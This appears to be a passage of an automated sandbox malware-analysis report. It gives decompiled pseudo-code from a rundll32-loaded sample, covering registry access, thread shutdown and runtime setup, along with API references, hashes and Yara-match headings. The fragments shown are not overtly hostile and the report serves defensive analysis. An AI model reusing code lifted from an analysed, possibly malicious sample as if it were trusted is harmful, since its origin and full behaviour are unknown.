                                                                                              • wsprintfW.USER32 ref: 04269654
                                                                                                • Part of subcall function 04260C60: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,0426966F,?,?), ref: 04260C73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Open$CloseQueryValuewsprintf
                                                                                              • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 734024169-1865207932
                                                                                              • Opcode ID: a297bf40b9b4ef5b58a82aa34cca5f4391dfa4f5e3b76381c4c873d3e065a002
                                                                                              • Instruction ID: 17b71f993fed856b81df825fe4f8dd6a21a8ccf6c0fe798bdccadd96925c538c
                                                                                              • Opcode Fuzzy Hash: a297bf40b9b4ef5b58a82aa34cca5f4391dfa4f5e3b76381c4c873d3e065a002
                                                                                              • Instruction Fuzzy Hash: 3F01BD31B192065BC724DFB889544F9BBA9DF8510CF2001EEC0168F102E931AD0AC790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E0428A327(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                                                              				signed int _t15;
                                                                                              				intOrPtr _t20;
                                                                                              				void* _t24;
                                                                                              				signed int _t25;
                                                                                              				void* _t27;
                                                                                              				intOrPtr _t28;
                                                                                              				void* _t29;
                                                                                              				void* _t34;
                                                                                              
                                                                                              				_t26 = __edx;
                                                                                              				_t24 = __ecx;
                                                                                              				_t23 = __ebx;
                                                                                              				E042767B0(0x42a1898, 0xc);
                                                                                              				_t28 = 0;
                                                                                              				 *((intOrPtr*)(_t29 - 0x1c)) = 0;
                                                                                              				_t27 = E04288930(__ebx, _t24, __edx);
                                                                                              				_t25 =  *0x42a46e0; // 0xfffffffe
                                                                                              				if(( *(_t27 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t27 + 0x4c)) == 0) {
                                                                                              					L5:
                                                                                              					_t15 = E04288EF7(5);
                                                                                              					_pop(_t25);
                                                                                              					 *((intOrPtr*)(_t29 - 4)) = _t28;
                                                                                              					_t28 =  *((intOrPtr*)(_t27 + 0x48));
                                                                                              					 *((intOrPtr*)(_t29 - 0x1c)) = _t28;
                                                                                              					_t34 = _t28 -  *0x42a4630; // 0x683f28
                                                                                              					if(_t34 != 0) {
                                                                                              						if(_t28 != 0) {
                                                                                              							asm("lock xadd [esi], eax");
                                                                                              							if((_t15 | 0xffffffff) == 0 && _t28 != 0x42a4410) {
                                                                                              								E042884AD(_t28);
                                                                                              								_pop(_t25);
                                                                                              							}
                                                                                              						}
                                                                                              						_t20 =  *0x42a4630; // 0x683f28
                                                                                              						 *((intOrPtr*)(_t27 + 0x48)) = _t20;
                                                                                              						_t28 =  *0x42a4630; // 0x683f28
                                                                                              						 *((intOrPtr*)(_t29 - 0x1c)) = _t28;
                                                                                              						asm("lock inc dword [esi]");
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_t29 - 4)) = 0xfffffffe;
                                                                                              					E0428A3B8();
                                                                                              					goto L3;
                                                                                              				} else {
                                                                                              					_t28 =  *((intOrPtr*)(_t27 + 0x48));
                                                                                              					L3:
                                                                                              					if(_t28 != 0) {
                                                                                              						return E042767F6();
                                                                                              					}
                                                                                              					E04287199(_t23, _t25, _t26, _t27, _t28);
                                                                                              					goto L5;
                                                                                              				}
                                                                                              			}











                                                                                              0x0428a327
                                                                                              0x0428a327
                                                                                              0x0428a327
                                                                                              0x0428a32e
                                                                                              0x0428a333
                                                                                              0x0428a335
                                                                                              0x0428a33d
                                                                                              0x0428a33f
                                                                                              0x0428a34b
                                                                                              0x0428a35e
                                                                                              0x0428a360
                                                                                              0x0428a365
                                                                                              0x0428a366
                                                                                              0x0428a369
                                                                                              0x0428a36c
                                                                                              0x0428a36f
                                                                                              0x0428a375
                                                                                              0x0428a379
                                                                                              0x0428a37e
                                                                                              0x0428a382
                                                                                              0x0428a38d
                                                                                              0x0428a392
                                                                                              0x0428a392
                                                                                              0x0428a382
                                                                                              0x0428a393
                                                                                              0x0428a398
                                                                                              0x0428a39b
                                                                                              0x0428a3a1
                                                                                              0x0428a3a4
                                                                                              0x0428a3a4
                                                                                              0x0428a3a7
                                                                                              0x0428a3ae
                                                                                              0x00000000
                                                                                              0x0428a352
                                                                                              0x0428a352
                                                                                              0x0428a355
                                                                                              0x0428a357
                                                                                              0x0428a3c8
                                                                                              0x0428a3c8
                                                                                              0x0428a359
                                                                                              0x00000000
                                                                                              0x0428a359

                                                                                              APIs
                                                                                                • Part of subcall function 04288930: GetLastError.KERNEL32(?,00000000,0427EFC2,00000000,00000002,?,0427FC23,04280991,00000000,?,00000002), ref: 04288934
                                                                                                • Part of subcall function 04288930: _free.LIBCMT ref: 04288967
                                                                                                • Part of subcall function 04288930: SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04280991,00000000,?,0426707A,00000002), ref: 042889A8
                                                                                                • Part of subcall function 04288930: _abort.LIBCMT ref: 042889AE
                                                                                              • _abort.LIBCMT ref: 0428A359
                                                                                              • _free.LIBCMT ref: 0428A38D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast_abort_free
                                                                                              • String ID: (?h
                                                                                              • API String ID: 289325740-3534228764
                                                                                              • Opcode ID: b9e2c2e137d3a522ab22587573517b172c12ed5af3146018b3188e490f0217ca
                                                                                              • Instruction ID: df4ba6d7ef2a3341dba0efc898299a8df81de75db5e0c283da55b71e8b86d1c3
                                                                                              • Opcode Fuzzy Hash: b9e2c2e137d3a522ab22587573517b172c12ed5af3146018b3188e490f0217ca
                                                                                              • Instruction Fuzzy Hash: 88012D71F23A329BD722BF6DA40065DF360FB44B25B19415ED864676C0CB74B9528FC1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 68%
                                                                                              			E0425E660() {
                                                                                              				intOrPtr* _t10;
                                                                                              				void* _t11;
                                                                                              				void** _t19;
                                                                                              				intOrPtr* _t21;
                                                                                              				void* _t28;
                                                                                              
                                                                                              				_t10 =  *0x42a7aec; // 0x6708f0
                                                                                              				_t21 =  *_t10;
                                                                                              				if(_t21 == _t10) {
                                                                                              					return _t10;
                                                                                              				}
                                                                                              				do {
                                                                                              					_t19 =  *(_t21 + 8);
                                                                                              					_t11 =  *_t19;
                                                                                              					if(_t11 == 0) {
                                                                                              						goto L9;
                                                                                              					}
                                                                                              					_t19[0xa] = 1;
                                                                                              					_t19[9] = 0;
                                                                                              					if( *((intOrPtr*)(_t11 + 4)) != 0) {
                                                                                              						L7:
                                                                                              						_t11 = _t19[8];
                                                                                              						if(_t11 != 0) {
                                                                                              							WaitForSingleObject(_t11, 0xffffffff);
                                                                                              							_t11 = CloseHandle(_t19[8]);
                                                                                              							_t19[8] = 0;
                                                                                              						}
                                                                                              						goto L9;
                                                                                              					}
                                                                                              					_t17 = _t19[0xb];
                                                                                              					if(_t19[0xb] == 0) {
                                                                                              						goto L9;
                                                                                              					}
                                                                                              					_t11 = E0425D260(_t17, "stop");
                                                                                              					if(_t11 == 0) {
                                                                                              						goto L9;
                                                                                              					}
                                                                                              					 *_t11();
                                                                                              					goto L7;
                                                                                              					L9:
                                                                                              					_t19[0xa] = 0;
                                                                                              					_t21 =  *_t21;
                                                                                              					_t28 = _t21 -  *0x42a7aec; // 0x6708f0
                                                                                              				} while (_t28 != 0);
                                                                                              				return _t11;
                                                                                              			}








                                                                                              0x0425e660
                                                                                              0x0425e666
                                                                                              0x0425e66a
                                                                                              0x0425e6d8
                                                                                              0x0425e6d8
                                                                                              0x0425e674
                                                                                              0x0425e674
                                                                                              0x0425e677
                                                                                              0x0425e67b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425e681
                                                                                              0x0425e688
                                                                                              0x0425e68f
                                                                                              0x0425e6a8
                                                                                              0x0425e6a8
                                                                                              0x0425e6ad
                                                                                              0x0425e6b2
                                                                                              0x0425e6b7
                                                                                              0x0425e6bd
                                                                                              0x0425e6bd
                                                                                              0x00000000
                                                                                              0x0425e6ad
                                                                                              0x0425e691
                                                                                              0x0425e696
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425e69d
                                                                                              0x0425e6a4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425e6a6
                                                                                              0x00000000
                                                                                              0x0425e6c4
                                                                                              0x0425e6c4
                                                                                              0x0425e6cb
                                                                                              0x0425e6cd
                                                                                              0x0425e6cd
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,0425E869), ref: 0425E6B2
                                                                                              • CloseHandle.KERNEL32(?), ref: 0425E6B7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandleObjectSingleWait
                                                                                              • String ID: stop
                                                                                              • API String ID: 528846559-3109426870
                                                                                              • Opcode ID: d793f1565263ff685608fb6ac58af1874628e66ca26266a2ac8e674d264a8cf9
                                                                                              • Instruction ID: 4f26feb6559121eec6c6f14e57bb160ebcc2779d301356d1346222449cd7331a
                                                                                              • Opcode Fuzzy Hash: d793f1565263ff685608fb6ac58af1874628e66ca26266a2ac8e674d264a8cf9
                                                                                              • Instruction Fuzzy Hash: B6014F32710613AFEB10DF29E848B15B3A4FF483A4F164218DC5897AA0C774FD50CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 68%
                                                                                              			E0425E550(intOrPtr* __ecx) {
                                                                                              				intOrPtr _t10;
                                                                                              				void* _t12;
                                                                                              				intOrPtr* _t16;
                                                                                              				intOrPtr* _t20;
                                                                                              
                                                                                              				_t20 = __ecx;
                                                                                              				_t10 =  *__ecx;
                                                                                              				if(_t10 == 0) {
                                                                                              					L7:
                                                                                              					 *(_t20 + 0x28) = 0;
                                                                                              					return 1;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(__ecx + 0x28)) = 1;
                                                                                              					 *(__ecx + 0x24) = 0;
                                                                                              					if( *((intOrPtr*)(_t10 + 4)) != 0) {
                                                                                              						L5:
                                                                                              						_t12 =  *(_t20 + 0x20);
                                                                                              						if(_t12 != 0) {
                                                                                              							WaitForSingleObject(_t12, 0xffffffff);
                                                                                              							CloseHandle( *(_t20 + 0x20));
                                                                                              							 *(_t20 + 0x20) = 0;
                                                                                              						}
                                                                                              						goto L7;
                                                                                              					} else {
                                                                                              						_t19 =  *((intOrPtr*)(__ecx + 0x2c));
                                                                                              						if( *((intOrPtr*)(__ecx + 0x2c)) == 0) {
                                                                                              							L8:
                                                                                              							 *(_t20 + 0x28) = 0;
                                                                                              							return 0;
                                                                                              						} else {
                                                                                              							_t16 = E0425D260(_t19, "stop");
                                                                                              							if(_t16 == 0) {
                                                                                              								goto L8;
                                                                                              							} else {
                                                                                              								 *_t16();
                                                                                              								goto L5;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}







                                                                                              0x0425e551
                                                                                              0x0425e553
                                                                                              0x0425e557
                                                                                              0x0425e5a4
                                                                                              0x0425e5a4
                                                                                              0x0425e5b1
                                                                                              0x0425e559
                                                                                              0x0425e55d
                                                                                              0x0425e564
                                                                                              0x0425e56b
                                                                                              0x0425e584
                                                                                              0x0425e584
                                                                                              0x0425e589
                                                                                              0x0425e58e
                                                                                              0x0425e597
                                                                                              0x0425e59d
                                                                                              0x0425e59d
                                                                                              0x00000000
                                                                                              0x0425e56d
                                                                                              0x0425e56d
                                                                                              0x0425e572
                                                                                              0x0425e5b2
                                                                                              0x0425e5b4
                                                                                              0x0425e5b8
                                                                                              0x0425e574
                                                                                              0x0425e579
                                                                                              0x0425e580
                                                                                              0x00000000
                                                                                              0x0425e582
                                                                                              0x0425e582
                                                                                              0x00000000
                                                                                              0x0425e582
                                                                                              0x0425e580
                                                                                              0x0425e572
                                                                                              0x0425e56b

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,0425E288,00000000,0425F0D5,00000000,00000000,?,?,00000001), ref: 0425E58E
                                                                                              • CloseHandle.KERNEL32(?), ref: 0425E597
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandleObjectSingleWait
                                                                                              • String ID: stop
                                                                                              • API String ID: 528846559-3109426870
                                                                                              • Opcode ID: 6ad212bbe526f5c5f8e95a565f49c002277784e21ed3077003f8245a90c98fbd
                                                                                              • Instruction ID: 19ae2b81a879ff8755175fefb0c245fa561cd750c8cc205b57b7b79aee661c46
                                                                                              • Opcode Fuzzy Hash: 6ad212bbe526f5c5f8e95a565f49c002277784e21ed3077003f8245a90c98fbd
                                                                                              • Instruction Fuzzy Hash: EDF049703247018FEB209F69E848752B7E4BF08364F154A1CE89AC66A0EB74F980CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04276A70(intOrPtr* __ecx, void* __eflags) {
                                                                                              				intOrPtr* _t13;
                                                                                              
                                                                                              				_t13 = __ecx;
                                                                                              				E04276AC3(__ecx);
                                                                                              				 *__ecx = 0x38;
                                                                                              				 *((intOrPtr*)(__ecx + 8)) = 0x4250000;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) = 0x4250000;
                                                                                              				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
                                                                                              				 *((intOrPtr*)(__ecx + 0x10)) = 0x4294758;
                                                                                              				if(E042516B0(__ecx + 0x14) < 0) {
                                                                                              					if(IsDebuggerPresent() != 0) {
                                                                                              						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
                                                                                              					}
                                                                                              					 *0x42a78c4 = 1;
                                                                                              				}
                                                                                              				return _t13;
                                                                                              			}




                                                                                              0x04276a71
                                                                                              0x04276a73
                                                                                              0x04276a7d
                                                                                              0x04276a86
                                                                                              0x04276a89
                                                                                              0x04276a8c
                                                                                              0x04276a93
                                                                                              0x04276aa1
                                                                                              0x04276aab
                                                                                              0x04276ab2
                                                                                              0x04276ab2
                                                                                              0x04276ab8
                                                                                              0x04276ab8
                                                                                              0x04276ac2

                                                                                              APIs
                                                                                                • Part of subcall function 042516B0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,04276A9F,00000000,?,042A16F4,?,?,?,?,?,?,?,04275B38), ref: 042516B3
                                                                                                • Part of subcall function 042516B0: GetLastError.KERNEL32(?,?,?,?,?,?,04275B38), ref: 042516BD
                                                                                              • IsDebuggerPresent.KERNEL32(00000000,?,042A16F4,?,?,?,?,?,?,?,04275B38), ref: 04276AA3
                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,?,?,?,04275B38), ref: 04276AB2
                                                                                              Strings
                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 04276AAD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                              • API String ID: 450123788-631824599
                                                                                              • Opcode ID: 07a88f6cd6d27779a6798b2bc8f899954f483dee4a31fba0183358ce1cb847b2
                                                                                              • Instruction ID: 2cae76bebfcc98b802785083a756fc367330cc56186c15a69d0fafd8403a8a4f
                                                                                              • Opcode Fuzzy Hash: 07a88f6cd6d27779a6798b2bc8f899954f483dee4a31fba0183358ce1cb847b2
                                                                                              • Instruction Fuzzy Hash: 34E06D70B157418FE720AF28E4087427BE0BB04718F05899CD895C2240EBB8FC55CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%